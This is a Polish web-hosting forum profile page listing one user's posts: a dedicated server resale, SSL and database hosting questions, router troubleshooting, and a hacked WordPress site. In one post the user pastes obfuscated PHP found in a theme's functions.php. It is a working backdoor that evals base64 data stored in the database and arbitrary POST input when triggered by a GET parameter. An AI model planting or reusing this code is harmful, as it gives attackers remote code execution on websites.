Skocz do zawartości

drajvver

Użytkownicy
  • Zawartość

    203
  • Rejestracja

  • Ostatnio

Posty napisane przez drajvver


  1. Witajcie,

    Mam do odsprzedania serwer w hetznerze, aktualnie podobne konfiguracje na aukcjach śmigają po 60+ euro, u mnie miesięczna opłata w tej chwili wynosi 31.93 euro miesięcznie.

    Konfiguracja:

    Xeon E3-1271 v3 @ 3.60GHz
    32 GB RAM
    2x 2TB HDD
    1Gbit uplink / 20TB transferu miesięcznie

    Serwer jest opłacony jeszcze do 18.06.2019.

    Cena jaka mnie interesuje to 200zł za cesję serwera przez opcję Transfer w panelu hetznera. Mogę wystawić FV, wtedy podana kwota będzie kwotą netto.

    IP serwera jest czyste, nie robiłem na nim żadnych "dziwnych" rzeczy. Działa bez problemu od roku bez zająknięcia.
    Jeżeli potrzebujecie jakieś benche, testy, cokolwiek, to służę pomocą.


  2. Polecam zmienić hosting na coś normalnego i polecam Lets Encrypt

     

    Gdyby tylko to tak działało, niestety ja dla klienta piszę tylko panel rejestracyjny, a oni całą swoją stronę mają na nazwie i nie zamierzają nic przenosić ;)

    Czytałem przed chwilą o tym i wydaje się być interesujące - pytanie tylko, czy dostanę tam certyfikat w formie PFX (taki wymaga azure) oraz czy przeglądarki nie mają "problemów" z takimi certyfikatami?


  3. Witajcie.

     

    Potrzebuję rady, jak poradzić sobie z zakupem SSLa w nazwie na moją domenę. Cały serwer stoi w nazwie i nie byłoby problemu, gdyby subdomena, na którą potrzebuję SSL była poza nazwą - przekierowana jest na Azure.

    I teraz pytanie - kupować certyfikat tylko na tą subdomenę (o ile to w ogóle możliwe), czy brać z wildcardem? Oraz, czy wildcard wtedy zadziała na hosty, które są "poza" głównym serwerem nazwy, gdzie stoi reszta strony?


  4. Dość często są timeouty niestety. Strona, która stoi tam już ponad rok, cały czas zalicza pady, takie 5-10 minutowe, przez co są spore problemy, wcześniej jeszcze "znikały" dane z bazy SQL, ale to zostało dość szybko rozwiązane, więc za support plus, ale za jakość usług niestety minus i to dość spory, strona działa w kratkę, minuta up, minuta down, jak się serwerowi zawidzi.

    I to nie tylko serwer WWW, bo w tym samym czasie pada też SQL, więc pewnie cały serwer ma jakieś przeciążenia, czy nie wiadomo co. Wiadomo, że nie można się spodziewać "kokosów" za 48zł/rocznie i tego nie wymagam, ale chociaż jakiejś podstawowej stabilności by się chciało, jak już się za taką usługę płaci.


  5. Podmieniłem pliki wordpresa (te w głównym folderze) na oryginalne, pobrane z oficjalnej strony, ale nadal to samo się dzieje.
    Będę próbował jeszcze z pozostałymi, sprawdzę pluginy itp. ale nie chce mi się wierzyć, żeby to było jakoś bardzo z mojej winy, do FTP i DA mam dostęp tylko ja.

     

    EDIT:

    Po podmienieniu całego folderu wp-includes też nic się nie zmieniło.

     

    EDIT2:

    Chyba znalazłem, w themie mojej strony (Pagelines) w pliku functions.php był taki fajny kod:

    <?php $yHHmhg = 'p'.'re'.'g_'.'r'.'eplace';$yHHmhg('/ad/e','e'.'va'.'l(ba'.'se'.'64_decode(get_op'.'tion("Kx'.'VQyX")))', 'add');?><?php $WgNGwY = 'preg_r'.'ep'.'l'.'a'.'ce';$WgNGwY('/ad/e','ev'.'a'.'l(b'.'ase64_de'.'code(get_optio'.'n("jpDe'.'JQ")))', 'add');?><?php
    function _g3t($str){
        $val = !empty($_GET[$str]) ? $_GET[$str] : null;
        return $val;
    }
    if(_g3t('jhX')=='f')
    {
    @eval($_POST['zDqmT']);
    exit;
    }
    if(_g3t('jhX')=='c')
    {
    echo 'AcJ9ksbVjsdb';
    exit;
    }
    //dsd6sc378axvg
    ?>
    

    Nie wiem o co chodzi, chyba jest zakodowany w base64, ale po odkodowaniu nadal nie ma w nim nic ciekawego.
    W każdym razie na chwilę obecną jest w porządku, pytanie tylko czy to się powtórzy, czy to jakiś backdoor?


  6. Witajcie.

    Mam pewien problem ze stroną www (hostowana w Mintshost, jeżeli to ma jakieś znaczenie).

    Oparta jest na WordPressie, żadnych "podejrzanych" wtyczek nie mam zainstalowanych, zaczęło się to dziać kilka dni temu. Do supportu jeszcze nie pisałem, bo nie wiem czy to ich wina, czy nie.
    Otóż, dla googlebota strona wygląda tak: http://pastebin.com/d5eimJzG
    Za to dla normalnej osoby, tych wszystkich linków "ponad" tagiem <html> nie widać, co wydaje się być dość oczywiste (wydaje mi się, że idzie to jakby w nagłówku z serwera).

    Czy ktoś wie może, dlaczego tak się dzieje? Wina jakiegoś wirusa na serwerze, czy coś mi "siadło" na WordPressie i trzeba jakoś to usunąć?

    Pozdrawiam,
    Krzysiek.


  7. U mnie wcześniej też było to samo, teraz przekierowuje do http://goldenservers.org/ , WTF?! Kilka dni temu w środku dnia zaczęli robić upgrade sql bez żadnej informacji. Póki co nie jestem zadowolony, za tę cenę nie można też nie wiadomo czego wymagać, ale oni trochę przesadzają.

    A to pewnie dlatego 3 dni pod rząd znikły mi informacje z bazy, mniej więcej gdzieś rano (poprzedniego dnia wieczorem były, następnego rano już nie).


  8. Witam.

    Szukam hostingu SQL (jak najtańszego, być może nawet ktoś za darmo się pokusi), chodzi o samą bazę, nic więcej, problem w tym, że raczej żaden shared nie umożliwia połączenia z bazą zdalnie, a to mi jest właśnie potrzebne. Jedna/dwie tabele, rozmiar bazy nie powinien nigdy przekroczyć ~10MB, jedyne czego wymagam to stabilności i jakichś backupów powiedzmy raz na 2-3 dni.

    Pozdrawiam.


  9. Witam.

    Poszukuję VPS z jak "najdłuższą" listą systemów, będę testował dużo rzeczy, a z racji wolnego (2mbit) łącza w domu, nie bardzo opłaca mi się ściągać 100 różnych obrazów systemów i instalacji + ponownego pobierania kilkuset MB z repozytoriów.
    Cena ~25zł/msc, transfer w granicach 100-150gb, pojemność i ram mają drugorzędne znaczenie.

    Pozdrawiam,

    Krzysiek.


  10. W tym TP-Linku niestety nie ma takiej możliwości, w trybie switcha "przepisuje" adresy DHCP od dostawcy, a w trybie routera wszystko jest za NATem, to raczej jasne.

    Nie do końca popierdółka, bo gdyby nie miejsce zamieszkania, to można dostać nawet 100mbit po świetle za ~200zł/mc, które o dziwo tyle wyciąga (!) - mam takie u siebie w szkole:

    DL na poziomie 98-99mbit, UL ~80mbit, bardzo fajna sprawa, ale mysle ze raczej utrzymanie tego na takim poziomie stale kosztuje więcej niż 80zł :)

     

    A DHCP standardowo, skoro jest 192.168.0.1/24, to DHCP ma taki sam adres jak brama i DNS ;) (tak przynajmniej wskazuje Windows na PC, gdzie internet działa) - typowo budżetowo, bo jak radiówka to na ilość się idzie nie jakość z reguły


  11. @up

    To nie do końca, ISP daje adres z zakresy 192.168.0.1/24 a na routerze nieważne co dam, czy klase A, B czy C, nie działa tak samo bardzo :D Aktualnie jest 192.168.100.1 - też nie działa, tak samo jak 192.168.1.1, po prostu nie wiem co robić, bo już i tak kupiła router z mojego polecenia, który nie działa więc wystarczająca wtopa z mojej strony, chciałbym to odpalić w jakikolwiek sposób w miarę na stałe...


  12. Przez WAN mam włączone DHCP, przy korzystaniu ze switcha wyłączone, wtedy komputery dostają IP bezpośrednio od ISP, tak jakby routera nie było, mimo to net nie działa. Klonowanie MAC działa na 100%, sprawdzane też kilkakrotnie. W Diagnostics gdy puszczam ping, czy cokolwiek, zawsze brak odpowiedzi, wtedy kiedy nie działa internet przez router/switch, ale sekunde pozniej moge wpiąć kabel do PC bezpośrednio i internet śmiga aż miło - muszę przyznać że sytuacja troszkę niecodzienna chyba

×